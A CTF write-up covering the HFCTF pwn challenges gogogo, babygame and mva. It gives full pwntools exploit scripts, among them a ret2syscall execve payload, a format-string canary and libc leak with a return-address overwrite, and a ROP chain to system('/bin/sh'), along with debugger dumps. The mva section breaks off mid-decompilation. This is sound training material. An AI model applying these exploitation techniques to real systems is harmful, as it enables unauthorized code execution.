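Filling the padding with "/bin/sh\x00" instead of arbitrary bytes means the string appears at many 8-byte-aligned addresses, so the pointer passed as the first argument does not have to be exact.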

Full exp:

from pwn import *

p=process('./gogogo')
elf=ELF('./gogogo')

p.recvuntil('PLEASE INPUT A NUMBER:\n')
p.sendline(str(1717986918))
p.recvuntil('PLEASE INPUT A NUMBER:\n')
p.sendline(str(1416925456))

A=0
B=0
C=0
D=0
E=0

p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')
while(True):
    E=E+1

    payload=str(A)+' '+str(B)+' '+str(C)+' '+str(D)
    p.sendline(payload)
    sleep(0.001)
    success("now is :"+str(A)+' '+str(B)+' '+str(C)+' '+str(D))

    recv = p.recv(5)
    if recv[0:1]==b'Y':
        success("find it")
        p.sendline("e")
        break

    a = int(recv[0:1])
    b = int(recv[2:3])

    success("A="+str(a)+","+"B="+str(b))
    D=D+1
    if D==10:
        D=0
        C=C+1
        if C==10:
            C=0
            B=B+1
            if B==10:
                B=0
                A=A+1

    if a==3:
        success("close.......")

    if E==7:
        E=0
        p.recvuntil('TRY AGAIN?\n')
        p.sendline("a")
        p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')

#gdb.attach(p,"b*0x45c849")

p.recvuntil('(4) EXIT\n')
p.sendline('4')
_syscall_Syscall = 0x47CF05
binsh = 0xc0000aa000
payload = b'/bin/sh\x00'*0x8c + p64(_syscall_Syscall) + p64(0) + p64(59) + p64(binsh) + p64(0) + p64(0)
p.recvuntil('ARE YOU SURE?\n')
p.send(payload)

p.interactive()

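Summary

This Go binary was quite a grind. Without a plugin, IDA shows nothing but meaningless names (the functions are not renamed) and is very hard to read; only with the plugin could I just about look up the relevant functions online

The challenge really tests reverse-engineering fundamentals. There is no heavy encryption or decryption, but the obfuscated-looking IDA output is still painful

Finally, the difficulties I hit while reproducing it:

  • Go's unreadable names (the plugin solves most of this)
  • Finding Go's entry point: at first I assumed the entry was main_main, and when breakpoints there did nothing I was stuck. In the end I set breakpoints on several main-related functions (main_init, runtime_main) and found the entry by debugging
  • Bypassing the "1A2B game": this took the most time. Just understanding the mechanism took a while. At first I was discussing with my roommate, who does algorithms, how to solve it within 7 guesses; later I noticed that the random number does not change and went straight to brute force. The script also took me a long time (inexplicable errors sometimes made the brute force fail, and only adding the sleep fixed it)
  • Debugging the ret hijack: this one was frustrating, because when exit runs, the program kills my GDB session and I cannot see the stack. In the end I single-stepped, set a breakpoint just before exit, and finally saw the stack address (Go does not seem to randomize its stack addresses)

Reverse-engineering skills really matter for a pwner; I need to train them more from now on…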

babygame

The file we were given is actually an archive; rename its extension and extract it

➜  桌面 ./babygame 
Welcome to HFCTF!
Please input your name:
ywx
Hello, ywx

Let's start to play a game!
0. rock
1. scissor
2. paper
round 1:
babygame: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=50007d900d58090aa96310390fcebd6350df9f31, for GNU/Linux 3.2.0, stripped

[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/babygame'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

64-bit, dynamically linked, all protections enabled

GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release versi

Vulnerability analysis

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
    char name[256]; // [rsp+0h] [rbp-120h] BYREF
    unsigned int seed; // [rsp+100h] [rbp-20h]
    int v6; // [rsp+104h] [rbp-1Ch]
    unsigned __int64 v7; // [rsp+108h] [rbp-18h]

    v7 = __readfsqword(0x28u);
    ((void (__fastcall *)())((char *)&init_s + 1))();
    seed = time(0LL);
    puts("Welcome to HFCTF!");
    puts("Please input your name:");
    read(0, name, 0x256uLL); // stack overflow: 0x256 bytes into a 256-byte buffer
    printf("Hello, %s\n", name);
    srand(seed); // seed the generator
    v6 = game(); // returns 1 with probability 1/3
    if ( v6 > 0 )
        pwn();
    return 0LL;
}
unsigned __int64 pwn()
{
    char buf[264]; // [rsp+0h] [rbp-110h] BYREF
    unsigned __int64 canary; // [rsp+108h] [rbp-8h]

    canary = __readfsqword(0x28u);
    puts("Good luck to you.");
    read(0, buf, 0x100uLL);
    printf(buf); // format string vulnerability
    return __readfsqword(0x28u) ^ canary;
}

A format string vulnerability; I haven't run into one in a long time

Exploitation plan

There is a stack overflow, which can be used to leak "pro_base"

pwndbg> stack 50
00:0000│ rsp 0x7ffe86861e08 —▸ 0x558b6a2142e3 ◂— lea rax, [rbp - 0x30]
01:0008│ rsi 0x7ffe86861e10 ◂— 0x0
... ↓ 3 skipped
05:0028│ 0x7ffe86861e30 —▸ 0x558b6a214180 ◂— endbr64
06:0030│ 0x7ffe86861e38 ◂— 0x65ed34df67df5f00
07:0038│ rbp 0x7ffe86861e40 —▸ 0x7ffe86861e60 —▸ 0x7ffe86861f90 ◂— 0x0
08:0040│ 0x7ffe86861e48 —▸ 0x558b6a2143a6 ◂— mov dword ptr [rbp - 4], eax
09:0048│ 0x7ffe86861e50 ◂— 0x6a214180
0a:0050│ 0x7ffe86861e58 ◂— 0x7fef00000002
0b:0058│ 0x7ffe86861e60 —▸ 0x7ffe86861f90 ◂— 0x0
0c:0060│ 0x7ffe86861e68 —▸ 0x558b6a214524 ◂— mov dword ptr [rbx], eax
0d:0068│ 0x7ffe86861e70 ◂— 'aaaaaaaa\n\t' // input 'a'*8
0e:0070│ 0x7ffe86861e78 ◂— 0x9800000090a /* '\n\t' */
0f:0078│ 0x7ffe86861e80 ◂— 0x98000000980
... ↓ 9 skipped
19:00c8│ 0x7ffe86861ed0 ◂— 0x0
1a:00d0│ 0x7ffe86861ed8 ◂— 0x100
1b:00d8│ 0x7ffe86861ee0 ◂— 0x4000000000
1c:00e0│ 0x7ffe86861ee8 ◂— 0x40000000200
1d:00e8│ 0x7ffe86861ef0 ◂— 0x0
... ↓ 7 skipped
25:0128│ 0x7ffe86861f30 —▸ 0x558b6a213040 ◂— 0x400000006
26:0130│ 0x7ffe86861f38 ◂— 0xf0
27:0138│ 0x7ffe86861f40 ◂— 0xc2
28:0140│ 0x7ffe86861f48 —▸ 0x7ffe86861f77 ◂— 0xed34df67df5f0000
/* stack_addr could also be leaked here, but then seed could not be overwritten */
29:0148│ 0x7ffe86861f50 —▸ 0x7ffe86861f76 ◂— 0x34df67df5f000000
2a:0150│ 0x7ffe86861f58 —▸ 0x558b6a2145bd ◂— add rbx, 1 // leak pro_base
2b:0158│ 0x7ffe86861f60 —▸ 0x7fefa87172e8 (__exit_funcs_lock) ◂— 0x0
2c:0160│ 0x7ffe86861f68 —▸ 0x558b6a214570 ◂— endbr64
2d:0168│ rbx-4 0x7ffe86861f70 ◂— 0x62381e44 // seed (name + 0x100)
2e:0170│ 0x7ffe86861f78 ◂— 0x65ed34df67df5f00 // canary
2f:0178│ 0x7ffe86861f80 —▸ 0x7ffe86862080 ◂— 0x1 // leak stack_addr
30:0180│ 0x7ffe86861f88 —▸ 0x558b6a214570 ◂— endbr64
31:0188│ 0x7ffe86861f90 ◂— 0x0
pwndbg>
32:0190│ 0x7ffe86861f98 —▸ 0x7fefa854a0b3 (__libc_start_main+243) ◂— mov edi, eax // leak libc_base
33:0198│ 0x7ffe86861fa0 —▸ 0x7fefa8747620 (_rtld_global_ro) ◂— 0x50d1300000000
34:01a0│ 0x7ffe86861fa8 —▸ 0x7ffe86862088 —▸ 0x7ffe86863393 ◂— './babygame'
35:01a8│ 0x7ffe86861fb0 ◂— 0x100000000
36:01b0│ 0x7ffe86861fb8 —▸ 0x558b6a214465 ◂— endbr64
37:01b8│ 0x7ffe86861fc0 —▸ 0x558b6a214570 ◂— endbr64
38:01c0│ 0x7ffe86861fc8 ◂— 0x70fd944c7d5b3327
39:01c8│ 0x7ffe86861fd0 —▸ 0x558b6a214180 ◂— endbr64
3a:01d0│ 0x7ffe86861fd8 —▸ 0x7ffe86862080 ◂— 0x1
3b:01d8│ 0x7ffe86861fe0 ◂— 0x0
3c:01e0│ 0x7ffe86861fe8 ◂— 0x0
3d:01e8│ 0x7ffe86861ff0 ◂— 0x8f009940421b3327
3e:01f0│ 0x7ffe86861ff8 ◂— 0x8f22c4e53d953327
3f:01f8│ 0x7ffe86862000 ◂— 0x0
... ↓ 2 skipped
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x558b6a213000 0x558b6a214000 r--p 1000 0
/home/yhellow/桌面/babygame
0x7fefa8526000 0x7fefa8548000 r--p 22000 0
/home/yhellow/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so

PIE is enabled, so my first idea was to leak pro_base

p.recvuntil('Please input your name:')

payload='a'*232
p.sendline(payload)

p.recvuntil('Hello')
p.recvuntil('\n')

leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))
leak_addr=leak_addr<<8 # the lowest byte was overwritten by the newline and is not printed, so restore it as 0x00
pro_base=leak_addr-5376
success('leak_addr >> '+hex(leak_addr))
success('pro_base >> '+hex(pro_base))

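Next we have to beat "game". My first idea was to keep sending "1" until it worked, but that pattern simply never appears in the pseudo-random sequence. So I decided to generate my moves from a random sequence as well: with a suitable seed, it can succeed
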
char name[256]; // [rsp+0h] [rbp-120h] BYREF
unsigned int seed; // [rsp+100h] [rbp-20h]

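seed can in fact be overwritten, but I had given that up in order to leak pro_base; to be able to overwrite seed as well, I would first have to leak the canary

This is where I got stuck: everything further up that could leak stack_addr is guarded by the canary, and even after beating "game", the format string bug cannot be exploited with PIE enabled

The script that beats "game":
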
seed=key.srand(0x31313131)

for i in range(100):
    p.recvuntil('round '+ str(i+1)+ ': \n')
    num=(key.rand()+1)%3
    p.sendline(str(num))

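After studying a writeup by an expert on our team, something struck me as odd: the canary is clearly overwritten, yet no error is raised right away and the rest of the exploit still runs normally. That makes it possible to leak stack_addr
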
p.recvuntil('Please input your name:')
payload='a'*256+'1'*4+'a'*12
p.send(payload)
p.recvuntil('1'*4+'a'*12)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))
stack_addr=leak_addr-528
success('leak_addr >> '+hex(leak_addr))
success('stack_addr >> '+hex(stack_addr))
seed=key.srand(0x31313131)

for i in range(100):
    p.recvuntil('round '+ str(i+1)+ ': \n')
    num=(key.rand()+1)%3
    p.sendline(str(num))

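This leaks the saved stack pointer stored right after the canary, and stack_addr is computed from it (I deliberately do not leak stack_base here, because a stack_base computed this way is inaccurate; stack_addr is the stack address that read writes to)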
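
The offsets used by that payload can be double-checked offline. This is a sketch that relies only on the decompiled layout (name at rbp-0x120, seed at rbp-0x20, canary at rbp-0x18) and on the sample addresses from the stack dump earlier in this section; `stack_addr_from_leak` is a hypothetical helper name.

```python
import struct

NAME_LEN = 256                       # char name[256] at rbp-0x120

# name | seed (4 bytes) | v6 (4 bytes) + canary (8 bytes)
payload = b"a" * NAME_LEN + b"1" * 4 + b"a" * 12

# srand() receives whatever now sits at name + 0x100.
seed = struct.unpack_from("<I", payload, NAME_LEN)[0]
print(hex(seed))

# The payload ends at rbp-0x10, so "%s" keeps printing the qword stored there.
print(hex(len(payload)))


def stack_addr_from_leak(leak):
    """Address of name[], given the pointer leaked from rbp-0x10."""
    return leak - 528


# Sample values from the stack dump: leak 0x7ffe86862080, name at 0x7ffe86861e70.
print(hex(stack_addr_from_leak(0x7FFE86862080)))
```

Because the seed becomes the fixed value 0x31313131, calling srand and rand from the same libc locally reproduces the sequence the program will use.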

The next step is to use the format string bug to build a loop (we certainly need to reach the vulnerable code more than once)

0x557a74bd3449    call   printf@plt                <printf@plt>
format: 0x7ffee08a7670 ◂— 0x252d70252d70252d ('-%p-%p-%')
vararg: 0x7ffee08a7670 ◂— 0x252d70252d70252d ('-%p-%p-%')

A first pass to locate the format arguments (sending a run of "-%p"):

Good luck to you.
-0x7ffee08a7670-0x100-0x7f82e8359002-0x12-(nil)-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x99059999-0xffffffffffffffff-0xd68-0x7ffee08a7894-0x7ffee08a7760-0x557a74bd3180-0x7ffee08a79a0-(nil)-(nil)-0x7f82e828f5f4-0x8-0x557a74bd32ef-0xa32-(nil)-(nil)\x99\x99\x05*** stack smashing detected ***: terminated
pwndbg> stack 50
00:0000│ rdi rsi rsp 0x7ffee08a7670 ◂— 0x252d70252d70252d ('-%p-%p-%')
01:0008│ 0x7ffee08a7678 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
02:0010│ 0x7ffee08a7680 ◂— 0x70252d70252d7025 ('%p-%p-%p')
03:0018│ 0x7ffee08a7688 ◂— 0x252d70252d70252d ('-%p-%p-%')
04:0020│ 0x7ffee08a7690 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
05:0028│ 0x7ffee08a7698 ◂— 0x70252d70252d7025 ('%p-%p-%p')
06:0030│ 0x7ffee08a76a0 ◂— 0x252d70252d70252d ('-%p-%p-%')
07:0038│ 0x7ffee08a76a8 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
08:0040│ 0x7ffee08a76b0 ◂— 0x70252d70252d7025 ('%p-%p-%p')
09:0048│ 0x7ffee08a76b8 ◂— 0x252d70252d70252d ('-%p-%p-%')
0a:0050│ 0x7ffee08a76c0 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
0b:0058│ 0x7ffee08a76c8 ◂— 0x70252d70252d7025 ('%p-%p-%p')
0c:0060│ 0x7ffee08a76d0 ◂— 0x99059999 /* No.18 */
0d:0068│ 0x7ffee08a76d8 ◂— 0xffffffffffffffff
0e:0070│ 0x7ffee08a76e0 ◂— 0xd68
0f:0078│ 0x7ffee08a76e8 —▸ 0x7ffee08a7894 ◂— 0x6161616100000001
10:0080│ 0x7ffee08a76f0 —▸ 0x7ffee08a7760 —▸ 0x7ffee08a7780 —▸ 0x7ffee08a78b0 ◂— 0x0
11:0088│ 0x7ffee08a76f8 —▸ 0x557a74bd3180 ◂— endbr64
12:0090│ 0x7ffee08a7700 —▸ 0x7ffee08a79a0 ◂— 0x1

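The first pass showed no suitable target, most likely because the "-%p" input itself overwrote it. The second pass therefore probes one position precisely, to see whether the overwritten region holds a target (sending "-%11$p"):
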
Good luck to you.
-0x7ffd31ce53d0*** stack smashing detected ***: terminated
pwndbg> stack 50
00:0000│ rdi rsi rsp 0x7ffd31ce52d0 ◂— 0x70243131252d /* '-%11$p' */
01:0008│ 0x7ffd31ce52d8 ◂— 0x0
02:0010│ 0x7ffd31ce52e0 —▸ 0x7ffd31ce53e0 —▸ 0x7ffd31ce5510 ◂— 0x0
03:0018│ 0x7ffd31ce52e8 —▸ 0x7efd3be66d6f (printf+175) ◂— mov rcx, qword ptr [rsp + 0x18] /* target No.9 */
04:0020│ 0x7ffd31ce52f0 ◂— 0x3000000010
05:0028│ 0x7ffd31ce52f8 —▸ 0x7ffd31ce53d0 ◂— 0x64f17ed180 /* No.11 */
06:0030│ 0x7ffd31ce5300 —▸ 0x7ffd31ce5310 ◂— 0x3000000010
07:0038│ 0x7ffd31ce5308 ◂— 0xb87bdb51f4286a00 /* canary No.13 */
08:0040│ 0x7ffd31ce5310 ◂— 0x3000000010
09:0048│ 0x7ffd31ce5318 ◂— 0x64
0a:0050│ 0x7ffd31ce5320 ◂— 0x0
0b:0058│ 0x7ffd31ce5328 ◂— 0x0
0c:0060│ 0x7ffd31ce5330 ◂— 0x99059999
0d:0068│ 0x7ffd31ce5338 ◂— 0xffffffffffffffff
0e:0070│ 0x7ffd31ce5340 ◂— 0xd68
0f:0078│ 0x7ffd31ce5348 —▸ 0x7ffd31ce54f4 ◂— 0x6161616100000001
10:0080│ 0x7ffd31ce5350 —▸ 0x7ffd31ce53c0 —▸ 0x7ffd31ce53e0 —▸ 0x7ffd31ce5510 ◂— 0x0
11:0088│ 0x7ffd31ce5358 —▸ 0x5590f17ed180 ◂— endbr64
12:0090│ 0x7ffd31ce5360 —▸ 0x7ffd31ce5600 ◂— 0x1
13:0098│ 0x7ffd31ce5368 ◂— 0x0
14:00a0│ 0x7ffd31ce5370 ◂— 0x0
15:00a8│ 0x7ffd31ce5378 —▸ 0x7efd3be495f4 (atoi+20) ◂— add rsp, 8 /* to leak libc_base No.27 */
16:00b0│ 0x7ffd31ce5380 ◂— 0x8

So the canary can be leaked at "No.13" and libc_base at "No.27"

Whatever we write has to make the program loop (I could not work this out on my own). After talking with the expert, I found a way:

00:0000│ rdi rsi rsp 0x7ffd31ce52d0 ◂— 0x70243131252d /* '-%11$p' */
01:0008│ 0x7ffd31ce52d8 ◂— 0x0
02:0010│ 0x7ffd31ce52e0 —▸ 0x7ffd31ce53e0 —▸ 0x7ffd31ce5510 ◂— 0x0
03:0018│ 0x7ffd31ce52e8 —▸ 0x7efd3be66d6f (printf+175) ◂— mov rcx,

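We can place a stack address inside the range that "read" controls and then modify what it points to directly (ideally the slot holding the return address of the function pwn)

22:0110│ rbp 0x7ffd1b017280 —▸ 0x7ffd1b0173b0 ◂— 0x0
23:0118│ 0x7ffd1b017288 —▸ 0x560a9a5ba543 ◂— mov eax, 0
/* the return address of pwn */
24:0120│ 0x7ffd1b017290 ◂— 0x6161616161616161 ('aaaaaaaa')
/* this is stack_addr (the address written by the first read) */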

The stack address of that return address can be computed directly and written at the "No.9" position (mind the alignment)

target_stack=stack_addr-0x8
payload = "%13$p%27$p"
payload +="%"+str(0x54c2-0x20)+"c"+"%9$hn"
payload = payload.ljust(0x18,"a")
payload = flat([payload,p64(target_stack)])

p.sendline(payload)
p.recvuntil('0x')
canary=int((p.recv(16)),16)
p.recvuntil('0x')
leak_addr=int((p.recv(12)),16)
libc_base=leak_addr-280052

success('canary >> '+hex(canary))
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))
pwndbg> stack 50
00:0000│ rdi rsi rsp 0x7fff152d9870 ◂— 0x3732257024333125 ('%13$p%27')
01:0008│ 0x7fff152d9878 ◂— 0x3636363132257024 ('$p%21666')
02:0010│ 0x7fff152d9880 ◂— 0x61616e6824392563 ('c%9$hnaa')
03:0018│ 0x7fff152d9888 —▸ 0x7fff152d9988 —▸ 0x55ddcf5f9543 ◂— mov eax, 0 /* this slot now holds the stack address of pwn's return address; its offset is "9" */
04:0020│ 0x7fff152d9890 ◂— 0x300000000a /* '\n' */
.text:00000000000014BD 128                 call    _puts
.text:00000000000014C2 128 lea rax, [rbp+name] // 0x54c2
.text:00000000000014C9 128 mov edx, 256h ; nbytes
.text:00000000000014CE 128 mov rsi, rax ; buf
.text:00000000000014D1 128 mov edi, 0 ; fd
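/* We have already leaked the canary, so redirecting execution back to the stack overflow is enough to get a shell */
/* The "5" is arbitrary: address randomization works at page granularity, so the low 3 hex digits (0x4c2) are fixed and only the 4th digit has to match, which gives a 1/16 chance */
/* There is no strict requirement on the exact address; anything nearby works (as long as it is before the read) */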

The final stack overflow to get a shell is straightforward. Here is the full exp (note the brute-force wrapper):

from pwn import *
from ctypes import *

elf=ELF('./babygame')
libc=ELF('./libc-2.31.so')
key=cdll.LoadLibrary('./libc-2.31.so')

def pwn():
#gdb.attach(p)
p.recvuntil('Please input your name:')
payload='a'*256+'1'*4+'a'*12
p.send(payload)
p.recvuntil('1'*4+'a'*12)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
stack_addr=leak_addr-528
success('leak_addr >> '+hex(leak_addr))
success('stack_addr >> '+hex(stack_addr))
seed=key.srand(0x31313131)

for i in range(100):
p.recvuntil('round '+ str(i+1)+ ': \n')
num=(key.rand()+1)%3
p.sendline(str(num))

p.recvuntil("Good luck to you.\n")

target_stack=stack_addr-0x8
payload = "%13$p%27$p"
payload +="%"+str(0x54c2-0x20)+"c"+"%9$hn"
payload = payload.ljust(0x18,"a")
payload = flat([payload,p64(target_stack)])

p.sendline(payload)

p.recvuntil('0x')
canary=int((p.recv(16)),16)
p.recvuntil('0x')
leak_addr=int((p.recv(12)),16)
libc_base=leak_addr-280052

success('canary >> '+hex(canary))
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

poprdi_ret=0x23b72+libc_base
ret=0x22679+libc_base
system_libc=libc.sym['system']+libc_base
binsh = next(libc.search(b"/bin/sh"))+libc_base

payload='a'*(0x120-0x18)+p64(canary)+'a'*0x10+'b'*0x8
payload+=p64(poprdi_ret)+p64(binsh)+p64(ret)+p64(system_libc)
p.sendline(payload)
sleep(1)
p.recvuntil("2. paper\n")
log.success("success")
p.sendline("1")
p.interactive()

if __name__ =="__main__":
while True:
sleep(0.5)
p=process('./babygame')
try:
pwn()
except EOFError:
p.close()
log.success("continue!!!")
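
The layout of the final overflow payload can be written out without pwntools. The sketch below is illustrative only: `build_overflow` and `system_chain` are hypothetical helper names, the two gadget offsets are the ones used in the exp, and the canary, libc base, `system` and "/bin/sh" offsets passed in the demo call are made-up placeholder values.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian qword (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

def build_overflow(canary, chain):
    payload = b"a" * (0x120 - 0x18)   # filler up to the canary
    payload += p64(canary)            # the canary must be written back unchanged
    payload += b"a" * 0x10            # bytes between the canary and saved rbp
    payload += b"b" * 0x8             # saved rbp (its value does not matter here)
    payload += b"".join(p64(q) for q in chain)
    return payload

def system_chain(libc_base, system_off, binsh_off,
                 pop_rdi_off=0x23b72, ret_off=0x22679):
    # pop rdi; "/bin/sh"; ret (stack alignment); system
    return [libc_base + pop_rdi_off, libc_base + binsh_off,
            libc_base + ret_off, libc_base + system_off]

# Placeholder values for illustration only.
demo = build_overflow(0x1122334455667700,
                      system_chain(0x7F0000000000, 0x52290, 0x1B45BD))
print(len(demo), demo[0x108:0x110].hex())
```

The chain starts at offset 0x128 of the payload, directly over the saved return address.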

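Summary

I slacked off in this competition and did not contribute much. Looking at the kernel pwn challenges and other things I could not even identify, I felt I would be of no use, so I spent an afternoon setting up a kernel environment instead. This challenge came out later, and it was one I could at least get a grip on

First, the "obstacles" I ran into on this challenge:

  • Not knowing what to leak with the stack overflow
    • There is a format string bug later on, so my first instinct was to leak "stack_addr"; but the canary guards the data behind it, so at the time I planned to leak the canary first and then leak everything else through the format string bug
  • How to get past the random-number check
    • This only held me up briefly (foolishly, I first thought about brute-forcing by always sending "1"); overwriting the seed solved it at once
  • How to get past the canary
    • This is where I was really stuck. Reading an expert's writeup, I saw that they simply overwrote the canary in order to leak the "stack_addr" behind it
    • In GDB I found that a corrupted canary is only detected in the function epilogue, where the check diverts execution to the failure handler instead of returning; in other words, the canary check only fires when the current function returns
  • How to make the program loop
    • The format string bug leaks the canary easily, but the program itself has no loop, so some return address has to be controlled to run the stack overflow again; this also puzzled me for a while during the reproduction
    • After talking with the expert, I learned that the key is to write "the stack address that holds some return address" onto the stack, then work out its offset and modify it (I had actually summarized this before and then forgotten it)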
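
The seed trick from the list above fits in a few lines. This is a sketch rather than the exploit itself: the function names are hypothetical, the move formula `(rand() + 1) % 3` is taken from the exp, and `predict_moves` only reproduces the target's sequence when the locally loaded libc implements `rand()` the same way as the target's (the exp loads `./libc-2.31.so` for that reason).

```python
import ctypes
import ctypes.util

def seed_from_overflow(filler=b"1" * 4):
    """The 4 bytes that land on the seed, read as a little-endian int."""
    return int.from_bytes(filler, "little")

def winning_move(rand_value):
    """Answer used by the exp against an opponent move of rand() % 3."""
    return (rand_value + 1) % 3

def predict_moves(seed, rounds=100):
    """Replay srand/rand locally; assumes the local libc matches the target's."""
    libc = ctypes.CDLL(ctypes.util.find_library("c"))
    libc.srand(seed)
    return [winning_move(libc.rand()) for _ in range(rounds)]

print(hex(seed_from_overflow()))
```

Overflowing the name buffer with `'1'*4` is what turns the seed into the known constant 0x31313131.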

This challenge helped me pick up things I had let slip and taught me a few new ones

mva

This was my first attempt at VMP pwn

➜  桌面 ./mva
[+] Welcome to MVA, input your code now :
aaaaaaaa
bbbbbbbb

mva: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b8c5659d20f095ec5c46c6bccb7c6a05d5952b02, for GNU/Linux 3.2.0, stripped

[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/mva'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

64-bit, dynamically linked, all protections enabled

The program after light cleanup:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
unsigned int v3; // eax
unsigned __int16 v5; // [rsp+20h] [rbp-240h]

init_s();
puts("[+] Welcome to MVA, input your code now :");
fread(&code, 0x100uLL, 1uLL, stdin);
puts("[+] MVA is starting ...");
while ( 1 )
{
((void (__fastcall *)())((char *)&sub_11E8 + 1))(); /* unknown routine */
v5 = HIBYTE(v3); /* decompilation error */
if ( v5 > 0xFu )
break;
if ( v5 <= 0xFu )
__asm { jmp rax }
}
puts("[+] MVA is shutting down ...");
return 0LL;
}

IDA fails to recognize the jump table, so it has to be fixed by hand:

  • First locate the jump table in IDA's ".rodata" section (at address "0x206C")
.rodata:000000000000206C unk_206C        db  8Bh                 ; DATA XREF: main+134↑o
.rodata:000000000000206C ; main+140↑o
.rodata:000000000000206D db 0F3h
.rodata:000000000000206E db 0FFh
.rodata:000000000000206F db 0FFh
.rodata:0000000000002070 db 99h
  • Press TAB to jump to the assembly behind " __asm { jmp rax } "
.text:00000000000013D6                 lea     rdx, ds:0[rax*4] // target
.text:00000000000013DE lea rax, unk_206C
.text:00000000000013E5 mov eax, [rdx+rax]
.text:00000000000013E8 cdqe
.text:00000000000013EA lea rdx, unk_206C
.text:00000000000013F1 add rax, rdx
.text:00000000000013F4 db 3Eh
.text:00000000000013F4 jmp rax
  • Apply the fix at the instruction just before the first "unk_206C" reference (remember to tick the second checkbox below)
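
The assembly above also shows how the table is encoded: each entry is a signed 32-bit offset (`mov eax, [rdx+rax]` followed by `cdqe`) that is added to the table address. A minimal sketch that decodes the first entry from the `.rodata` bytes shown; `switch_target` is a hypothetical helper name:

```python
import struct

TABLE_ADDR = 0x206C  # address of unk_206C in .rodata

def switch_target(entry_bytes, table_addr=TABLE_ADDR):
    """Resolve one jump-table entry: table address + sign-extended int32."""
    (rel,) = struct.unpack("<i", entry_bytes)
    return table_addr + rel

first_entry = bytes([0x8B, 0xF3, 0xFF, 0xFF])   # first four bytes of the table
print(hex(switch_target(first_entry)))          # 0x13f7
```

0x13F7 is the address right after the 3-byte `jmp rax` at 0x13F4, so the handler for key 0 directly follows the dispatcher.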

After the fix and some cleanup:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__int16 v4; // [rsp+1Ah] [rbp-246h]
__int16 v5; // [rsp+1Ch] [rbp-244h]
unsigned __int16 key; // [rsp+20h] [rbp-240h]
unsigned int enc_num; // [rsp+24h] [rbp-23Ch]
int v8; // [rsp+28h] [rbp-238h]
__int64 v9; // [rsp+30h] [rbp-230h]
__int64 v10; // [rsp+44h] [rbp-21Ch]
int v11; // [rsp+4Ch] [rbp-214h]
__int16 v12[260]; // [rsp+50h] [rbp-210h]
unsigned __int64 v13; // [rsp+258h] [rbp-8h]

v13 = __readfsqword(0x28u);
init_s();
v4 = 0;
v9 = 0LL;
v10 = 0LL;
v11 = 0;
v5 = 1;
puts("[+] Welcome to MVA, input your code now :");
fread(&code, 0x100uLL, 1uLL, stdin); /* read the code */
puts("[+] MVA is starting ...");
LABEL_102:
while ( v5 )
{
enc_num = enc();
key = HIBYTE(enc_num); /* top byte (bits 24-31) of enc_num: the opcode */
if ( key > 0xFu )
break;
if ( key <= 0xFu )
{
switch ( key )
{
case 0u:
v5 = 0;
goto LABEL_102;
case 1u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
goto LABEL_8;
*((_WORD *)&v10 + SBYTE2(enc_num)) = enc_num;
break;
case 2u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) + *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 3u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) - *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 4u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) & *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 5u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) | *((_WORD *)&v10 + (char)enc_num);
